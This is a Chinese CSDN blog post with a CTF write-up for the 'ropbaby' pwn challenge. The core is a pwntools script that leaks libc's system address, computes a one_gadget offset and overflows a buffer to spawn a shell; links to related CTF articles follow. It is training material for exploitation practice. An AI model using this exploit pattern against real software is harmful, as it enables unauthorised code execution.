1.实验吧_ropbaby(西普杯CTF)_onegadget

最新推荐文章于 2024-04-09 10:25:59 发布
最新推荐文章于 2024-04-09 10:25:59 发布
阅读量403 收藏
点赞数
分类专栏: 赛事复现 文章标签: ropbaby one_gadget
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42037374/article/details/90576476
版权
  • 分析
    1.先查看文件位数,安全机制
    2.查看strings,调用函数(特别注意常见的函数)
  • 漏洞点
    在这里插入图片描述在这里插入图片描述
  • EXP
from pwn import *
context.log_level = "debug"

p = process('./ropbaby')

p.recvuntil(': ')
p.sendline('2')
p.recvuntil('Enter symbol: ')
p.sendline('system')
a=p.recvline()
libc = a.split(': ')[-1]
lib=int(libc,16) - 0x45390
log.success('libc : %#x',lib)
onegadget =0x45216+lib

p.recvuntil(': ')
p.sendline('3')
p.recvuntil('(max 1024): ')
p.sendline('17')
p.sendline('a'*8 + p64(onegadget))
p.recvuntil(': ')  
p.sendline('4')  #让题目正常退出
p.interactive()
Jc^
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
18.10.9 实验吧----分道扬镳
qq_42192672的博客
10-08 482
都说大晚上做题有助于睡眠 提示:注意进入正确的流程,用最短的步骤走完迷宫。 我就不信这不是迷宫题………… 是个比较和善的exe,直接先找在IDA里找迷宫,可以看见的是这个迷宫貌似不是一个平面地图,我只看到了疑似的一行字符串,比有玄机,如下 分析main函数 第一步 走的步数应该是22步,即我们输入的字符串长度也是22 第二步 '上下左右'为:k\j\h\l,具体哪个...
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
one_gadget:在libc.so.6中找到一个小工具RCE的最佳工具
02-05
小工具 在进行ctf pwn挑战时,我们通常需要一个小工具RCE(远程代码执行),这会导致调用execve('/bin/sh', NULL, NULL) 。 这个宝石提供了这种小工具查找器,无需像傻瓜一样每次都使用objdump或IDA-pro :winking_face: 要使用此工具,请在命令行中键入one_gadget /path/to/libc并享受其中的魔力 :grinning_squinting_face: 安装 在RubyGems.org上可用! $ gem install one_gadget 注意:需要ruby版本> = 2.1.0,可以使用ruby --version进行检查。 支持的架构 i386 amd64(x86-64) a
one_gadget使用
最新发布
Jingged的博客
04-09 518
one_gadget是一个在二进制分析(尤其是利用分析)中常用的工具,它用于查找在给定二进制文件中可能存在的 "one-gadget" RCE(Remote Code Execution,远程代码执行)利用点。这些 "one-gadget" 通常指的是单个系统调用,当被正确利用时,能够直接赋予攻击者远程代码执行的能力,而无需链式利用多个漏洞。以下是使用one_gadget。
西普杯铁三2018——数据赛
chucen8556的博客
05-24 507
重做了一下,以前杂项只专注做过密码与隐写,在铁三上就等着GG 0x01 网站后台密码是多少? 打开第二个数据包 passwd:aabbcc 0x02 攻击者IP是多少? 由上图得出为202.1.1.2 0x03 网站后台登陆地址是多少(http://+IP+路径)? 0x04 后台写入的W...
pwn-内存泄漏one_gadget
leeham的博客
08-22 5785
pwn-内存泄漏/one_gadget 题目描述 题目可以下载到本地 https://github.com/LeeHaming/CTF-learn/blob/master/Caniso/Casino 解题思路 1.IDA分析函数逻辑 F5; 热键F5可以看到反汇编之后的程序逻辑;结合函数实际运行情况,可以得到这样的函数流程图: 此外我们可以找到修改mone...
西安西普_STR说明书V4.8
03-19
介绍了关于西安西普_STR说明书V4.8的详细说明,提供软启动器的技术资料的下载。
中国民航大学第四届“西普杯”信息安全竞赛-题目源程序和Writeup.zip
10-23
中国民航大学第四届“西普杯”信息安全竞赛-题目源程序和Writeup.zip
西普WEB大部分题解
12-09
【标题】"西普WEB大部分题解"是一个针对网络安全领域中的Web安全训练平台——西普(CTF)的解题指南。这个资源包含了对西普平台上多种Web安全挑战的解答,旨在帮助那些参与CTF(Capture The Flag)比赛或者希望提升...
西普STR系列A_B_G型软起动器说明书.pdf
09-18
西普STR系列A_B_G型软起动器说明书pdf,STR系列全数字式交流电动机软起动器是西安西普电力电子有限公司开发生产的具有国际先进水平的电动机起动设备,是国内最早推出和批量化生产的,目前已在众多企业及重点工程中...
西普STR系列软起动器A_B_G型样本V6.3.pdf
09-14
西普STR系列软起动器A_B_G型样本V6.3pdf,ZYR系列软起动器是我公司最新推出的中压电机固态软起动器。本装置是采用DSP技术、光纤高速传输技术和现代先进控制理论而设计开发的高性能、多功能、高安全性的新型智能化设备...
Exp10 Final “西普杯”北京天津CTF预选赛真题 writeup
a569847381的博客
06-11 1208
写在前面: 1.为什么做免考? 主要是想挑战一下自己,提高一点能力,之前在学校信安大赛的时候就对这方面有一些涉猎,希望能够通过完成这两套题目,水平得到进一步的提高。也希望能够给下一届参加信安大赛的学弟学妹们一些方法上的启发。 2.免考内容: 1.学校信安大赛网络攻防三等奖 2.西普杯北京+天津预算选赛CTF12道真题writeup 在这里我选用的是西普杯北京+天津预算选赛的题...
CTF-PWN-ROPbaby(实验吧)
SuperGate的博客
02-07 1851
学rop的时候刷到的题,感觉很有启发于是就写下来。 本文很大程度上借鉴了如下文章: http://wzt.ac.cn/2018/04/02/ROP/ 进入正题。我们发现题目中给了我们libc的文件,在ropbaby程序中也可以直接查找libc基地址,因此我们就可以不用在主程序中寻找了。 首先我们查看ropbaby文件的保护方式 由于开了NX,shellcode的方式就不好弄了,因此我...
西普CTF部分题目(解密)
热门推荐
技术学习人生
08-29 1万+
1、simple algorithm 题目地址:http://www.simplexue.com/ctf/examctfdetail/737 题目给了一个py脚本和一个密文文件,py脚本将明文转换为密文,现在需要将密文文件中的密文解密得到明文。 加密算法为flag = '[censored]' hflag = flag.encode('hex') iflag = int(hflag[2:],
实验_ROPBABY
weixin_44681716的博客
05-04 383
实验目的 用过这次实验去检验我们前期对栈溢出的掌握程度 实验文件 链接:https://pan.baidu.com/s/14fPpj6nULpywKwMv21r7rA 提取码:qbp9 实验步骤 首先检验ropbaby的保护机制 发现栈是no canary found,我们可以进行栈溢出。 首先对文件进行静态分析 ...
2016 西普杯丶河北CTF预选赛(1/6)
_Molory专栏
12-17 1578
1.打不开的文件 解:题目给的图片另存到本机仍然打不开。放到winHex看一下。 发现文件头少了GIF图需要的文件头:GIF8!使用notepad在首部加入GIF8。 重新打开gif图,图片终于正常显示。 除非你眼神好。。。反正我是不行。用SteSolve打开,分帧(Frame Browser),逐帧记录可得一串密码。 扔进答案输入框。提示答案不对。。。
buuctf [BJDCTF 2nd]one_gadget
carol2358的博客
04-18 573
libc可以在buuctf上下载。本题会泄漏printf的地址 14位,所以不用u64,u64用在6个字节的字符串上,改用int int - int one用one_gadget libc找,通过调试运行到call rdx,然后x/gx rdx的地址之类的,来确定里面的值 也可以不用info直接看到 发现最后一个是可行的 exp: from pwn import * from L...
pwnable tw BabyStack writeup
charlie_heng的专栏
03-02 1532
这题做得好难受….. 首先漏洞很明显是strcpy那里,可以strcpy超过0x3f个字符串 然后login,以\x00开头的话,就可以过login了 一开始我是想先泄漏程序的其中一个地址,然后利用stackOverflow 来rop一波的,然后发现,strcpy只能复制到\x00前,所以只能用one_gadget 来一发get shell 但是这里还有canary要过,这里很明显就是利用...
西普电机软启动器说明书 c型
08-24
西普电机软启动器 C型是一种使用于交流电动机的电气设备。它的主要功能是提供电压和电流的逐渐上升,以实现对电动机的平稳启动和停止控制。C型软启动器具有诸多优点,如节能、减少启动时的机械冲击、降低电动机和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值